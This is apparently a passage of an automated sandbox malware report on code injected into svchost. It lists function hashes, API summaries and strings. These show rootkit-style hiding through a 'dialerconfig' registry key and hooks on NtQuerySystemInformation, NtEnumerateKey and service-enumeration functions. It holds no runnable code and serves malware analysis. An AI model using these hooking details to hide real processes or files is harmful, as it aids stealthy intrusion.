                                                                                • Instruction Fuzzy Hash: EFB1C23A218E58C1EB548F29CC407E973A4F7D8B86F649016EE496B7A6DF35CC42CB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: fe4d7994dcb9cd90d1d8f6a94c807bf571fb46fda8be655a3b51a133ec55a95b
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: DB313A77204E84D6EB608F64E8407EE7360F788745F54442ADA4D6BBA9EF38C949CB10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: 16ea1a5afb74b80a445a2bb85521b88d592ea919e9d250425538b74944ba91bd
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: 72317E3A208F80D6DB20CF25E8403DE73A0F7C8B95F600116EA9D5BBA9DF38C5568B00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                • String ID:
                                                                                • API String ID: 1443284424-0
                                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction ID: e9e697ece340428b91d3096d1657db314af7b788c41ca0ee67ae2ecee833650c
                                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction Fuzzy Hash: 8CE1D336608A80DAE740CB64D8443DD7BB1F3C9789F644116DE49ABBA9DE34C967CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: 0a20dc87c9964215617a8eb43357a2dea1c519e5fc9c146ce02bf7335e8ab072
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: 4B71063B310E54E6EB109F71EC447D937A5F788B8AF105111DA4D6BB29DE28C956CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction ID: 30c682e7892007fa1e18b4f5837a20ff526662fe64583a20a07c6ad30c6a7cc6
                                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction Fuzzy Hash: AB51497B218B44D3EB14CF62E94839AB3A1F7C9F81F548128DA491BB24DF38C566CB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction ID: 943178bbab4604f49a565a5b29f4ee87ed4abebeecc9c2091b872128623959fc
                                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction Fuzzy Hash: 2C31B37E158E4AE0EA04EF64EC517D43321A7EC346FB1842394593F1779E388A6BCB90

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction ID: 10c61dbd0a57fbc221ac1cff4fa07a250fad4ac49ce6646bc7a0ffb9c29d1d80
                                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction Fuzzy Hash: 86213E3A618B44C2E710CB25F8483AA73A1F3C9BA6F604215DA5916BB8CF3CC55ACF01

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction ID: f332a3c4f0c717dae104b879ec849a6d65aad32391179d5c77b2931008f5e50c
                                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction Fuzzy Hash: 5A418237218B84E7E760CF61E9447DAB7A1F389B85F108129DB891BB54DF38D566CB00

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 440 158709d75f0-158709d75f6 441 158709d7631-158709d763b 440->441 442 158709d75f8-158709d75fb 440->442 443 158709d7758-158709d776d 441->443 444 158709d7625-158709d7664 call 158709d7ca0 442->444 445 158709d75fd-158709d7600 442->445 449 158709d777c-158709d7796 call 158709d7b34 443->449 450 158709d776f 443->450 463 158709d7732 444->463 464 158709d766a-158709d767f call 158709d7b34 444->464 447 158709d7602-158709d7605 445->447 448 158709d7618 __scrt_dllmain_crt_thread_attach 445->448 455 158709d7607-158709d7610 447->455 456 158709d7611-158709d7616 call 158709d7be4 447->456 453 158709d761d-158709d7624 448->453 461 158709d77cf-158709d7800 call 158709d7e70 449->461 462 158709d7798-158709d77cd call 158709d7c5c call 158709d7afc call 158709d7ff8 call 158709d7e10 call 158709d7e34 call 158709d7c8c 449->462 451 158709d7771-158709d777b 450->451 456->453 472 158709d7811-158709d7817 461->472 473 158709d7802-158709d7808 461->473 462->451 467 158709d7734-158709d7749 463->467 475 158709d7685-158709d7696 call 158709d7ba4 464->475 476 158709d774a-158709d7757 call 158709d7e70 464->476 478 158709d785e-158709d7874 call 158709d3458 472->478 479 158709d7819-158709d7823 472->479 473->472 477 158709d780a-158709d780c 473->477 490 158709d76e7-158709d76f1 call 158709d7e10 475->490 491 158709d7698-158709d76bc call 158709d7fbc call 158709d7aec call 158709d7b18 call 158709d9cdc 475->491 476->443 484 158709d78ff-158709d790c 477->484 497 158709d7876-158709d7878 478->497 498 158709d78ac-158709d78ae 478->498 485 158709d7825-158709d782d 479->485 486 158709d782f-158709d783d call 158709e3358 479->486 493 158709d7843-158709d7858 call 158709d75f0 485->493 486->493 507 158709d78f5-158709d78fd 486->507 490->463 511 158709d76f3-158709d76ff call 158709d7e60 490->511 491->490 543 158709d76be-158709d76c5 __scrt_dllmain_after_initialize_c 491->543 493->478 493->507 497->498 504 158709d787a-158709d789c call 158709d3458 call 158709d7758 497->504 505 158709d78b5-158709d78ca call 158709d75f0 498->505 506 158709d78b0-158709d78b3 498->506 504->498 537 158709d789e-158709d78a6 call 158709e3358 504->537 505->507 525 158709d78cc-158709d78d6 505->525 506->505 506->507 507->484 530 158709d7725-158709d7730 511->530 531 158709d7701-158709d770b call 158709d7d78 511->531 527 158709d78e1-158709d78f1 call 158709e3358 525->527 528 158709d78d8-158709d78df 525->528 527->507 528->507 530->467 531->530 542 158709d770d-158709d771b 531->542 537->498 542->530 543->490 544 158709d76c7-158709d76e4 call 158709d9c78 543->544 544->490
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 25e611c82109a42443ca2a13553f23dde90b8b4a93b32d479df0bf77dbe5ecb3
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 4C81A039788E49C6F650EB659C453E9B290A7CDB82F78842599047F7A7FE38C9438F10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 333 158709a69f0-158709a69f6 334 158709a6a31-158709a6a3b 333->334 335 158709a69f8-158709a69fb 333->335 336 158709a6b58-158709a6b6d 334->336 337 158709a6a25-158709a6a64 call 158709a70a0 335->337 338 158709a69fd-158709a6a00 335->338 342 158709a6b6f 336->342 343 158709a6b7c-158709a6b96 call 158709a6f34 336->343 353 158709a6b32 337->353 354 158709a6a6a-158709a6a7f call 158709a6f34 337->354 340 158709a6a02-158709a6a05 338->340 341 158709a6a18 __scrt_dllmain_crt_thread_attach 338->341 345 158709a6a11-158709a6a16 call 158709a6fe4 340->345 346 158709a6a07-158709a6a10 340->346 349 158709a6a1d-158709a6a24 341->349 347 158709a6b71-158709a6b7b 342->347 356 158709a6b98-158709a6bcd call 158709a705c call 158709a6efc call 158709a73f8 call 158709a7210 call 158709a7234 call 158709a708c 343->356 357 158709a6bcf-158709a6c00 call 158709a7270 343->357 345->349 358 158709a6b34-158709a6b49 353->358 366 158709a6a85-158709a6a96 call 158709a6fa4 354->366 367 158709a6b4a-158709a6b57 call 158709a7270 354->367 356->347 368 158709a6c02-158709a6c08 357->368 369 158709a6c11-158709a6c17 357->369 386 158709a6ae7-158709a6af1 call 158709a7210 366->386 387 158709a6a98-158709a6abc call 158709a73bc call 158709a6eec call 158709a6f18 call 158709a90dc 366->387 367->336 368->369 375 158709a6c0a-158709a6c0c 368->375 370 158709a6c19-158709a6c23 369->370 371 158709a6c5e-158709a6c74 call 158709a2858 369->371 377 158709a6c25-158709a6c2d 370->377 378 158709a6c2f-158709a6c3d call 158709b2758 370->378 394 158709a6c76-158709a6c78 371->394 395 158709a6cac-158709a6cae 371->395 376 158709a6cff-158709a6d0c 375->376 383 158709a6c43-158709a6c58 call 158709a69f0 377->383 378->383 398 158709a6cf5-158709a6cfd 378->398 383->371 383->398 386->353 406 158709a6af3-158709a6aff call 158709a7260 386->406 387->386 436 158709a6abe-158709a6ac5 __scrt_dllmain_after_initialize_c 387->436 394->395 403 158709a6c7a-158709a6c9c call 158709a2858 call 158709a6b58 394->403 396 158709a6cb0-158709a6cb3 395->396 397 158709a6cb5-158709a6cca call 158709a69f0 395->397 396->397 396->398 397->398 416 158709a6ccc-158709a6cd6 397->416 398->376 403->395 428 158709a6c9e-158709a6ca6 call 158709b2758 403->428 425 158709a6b01-158709a6b0b call 158709a7178 406->425 426 158709a6b25-158709a6b30 406->426 422 158709a6ce1-158709a6cf1 call 158709b2758 416->422 423 158709a6cd8-158709a6cdf 416->423 422->398 423->398 425->426 435 158709a6b0d-158709a6b1b 425->435 426->358 428->395 435->426 436->386 437 158709a6ac7-158709a6ae4 call 158709a9078 436->437 437->386
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: c2b72a5e78754227d56dbd305acf4b2c440957351f12af5e70819825c413278d
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 3A81B3B9608E41C6FA509B29AC413D972A0E7CD796F344025AA85BF796DF38C847EF00

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 547 158709d9804-158709d9842 548 158709d9933 547->548 549 158709d9848-158709d984b 547->549 550 158709d9935-158709d9951 548->550 549->550 551 158709d9851 549->551 552 158709d9854 551->552 553 158709d992b 552->553 554 158709d985a-158709d9869 552->554 553->548 555 158709d9876-158709d9895 call 158709e3138 554->555 556 158709d986b-158709d986e 554->556 563 158709d9897-158709d98a0 call 158709e3080 555->563 564 158709d98ed-158709d9902 555->564 557 158709d9874 556->557 558 158709d990d-158709d991c GetProcAddress 556->558 560 158709d98e1-158709d98e8 557->560 558->553 561 158709d991e-158709d9929 558->561 560->552 561->550 569 158709d98a2-158709d98b7 call 158709dad28 563->569 570 158709d98cf-158709d98d9 563->570 564->558 565 158709d9904-158709d9907 call 158709e30a8 564->565 565->558 569->570 573 158709d98b9-158709d98cd call 158709e3138 569->573 570->560 573->564 573->570
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction ID: ef8892e24330d55c3490a5fc64bcc720dc366a49e0b2ea068d929445bc262a23
                                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction Fuzzy Hash: BC31B43A35AE44E1EE11AB02EC107D97394B78DBA2F6945189D2D6E392DF38C4568B00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction ID: 678e6a64ae77ea35711f9060b52df17e6f0dc571c900bb9eb1b4d58fe10832b7
                                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction Fuzzy Hash: C5115B36215F40C6E7508B56EC4839972A0F7CCFE6F244228EA599B7A4DF78C9268B44
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction ID: 605ae0c5fc4444a5e44f86b30e1be22f4d8fd3f1459b7e039f4c2af0defd8569
                                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction Fuzzy Hash: B3D17C7A249F48D5DA70DB1AE89439A77A0F3CCB85F240116EA8D5BBA5DF38C552CF00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: fe0cafdca754bb0dce62d5bafccfd1fbdf8df8d32b801cc7944905e26050c8b7
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: 3F31863A749F5AD2E7159F56DC443A97390FB88B86F14C1249E482B755EF34C8638B00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: d6a487be8c80e4d218c9a83fb651c88bcf090149f0ce6339f20e5a6fd2dd3b5d
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: 89015E36304E41D6EA10DB12E8587A973A1F78CFC2F988035CE8957764DE38C9968B00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction ID: bf15e704f6403858d8d42cfcd6eb2d4770613fe67df2030ee4d80af52552d780
                                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction Fuzzy Hash: B1111E7A615F44C2EB249B21EC0979A77A1BB9CF47F244428D9492B765EF3DC81ACF00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 383ff32e568238b837e88c5d96d4421159f0f833f1cf646560342c8af26a8bdc
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: 7951D63A359A09D6EB14EF15E844B983395F3C8B89F608120DE266B74ADF35DC42CF00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: c79aa341e3225fb65009963fa503658fafe76f4003d0aeb7e83d5f305c969f9b
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: 3931E23A208B45D6E710EF11EC4879937A5F388BCAF248114AE5A2B756CF38C942CB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction ID: 9cd51c56bf66afd3f697c63216cecde92d8a3b691b99c039d21d90fcbab0d531
                                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction Fuzzy Hash: 48F04977304A45E1E7208B21FC943997760F7C8B85F949025CA495EA69DE6CCA5ACF00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: faad9be2767793de60da5213e16db54363fb9eba61d5be2a7d00a72c81c1f998
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: 2DF05439604F40D1EA004B13FD082A97221A7CCFD2F14D1319EA62BB39CE28C8528B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: acf1baf613080be46060738bdfe23f8d14c5bc3207b68563561bf008e0f48cdb
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: 19F05E7A325E44E2EF548B60EC883A43360ABCCB92F646019951B5D671CE28C8AACF00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction ID: 3584f88d8aa85d1c53dc84a72d8b83e83d68c137e618b8d1b87bcfe58d9cde4d
                                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction Fuzzy Hash: 7F02C83625DB84C6E760CB55E89039AB7A0F3C8795F200115EA8E9BBA9DF7CC495CF00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2210144848-0
                                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction ID: bd2f0b25102ebdb2c9f9cbea5ed8d76dbe5800a441c613ef0b6a34a9b80f5020
                                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction Fuzzy Hash: B381C23B610E44D9FB909B619C443ED36A1F7CCB86F644115DA0ABB7A6DE348CA3CB10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
